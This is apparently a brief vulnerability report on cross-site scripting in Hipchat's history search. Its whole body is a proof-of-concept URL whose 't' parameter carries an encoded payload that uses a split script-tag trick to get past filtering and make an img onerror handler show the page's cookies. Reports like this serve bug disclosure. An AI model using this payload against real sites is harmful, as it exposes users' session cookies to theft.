XSS in Hipchat history search

Proof of concept

https://example.hipchat.com/history/room/9999999/2014/05/14?q=test&t=%22%3E%3Cimg%20src=x%20o%3Cscript%3Enerror=%3Cscript%3Ealert(document.cookie)%3C/script%3E%3E,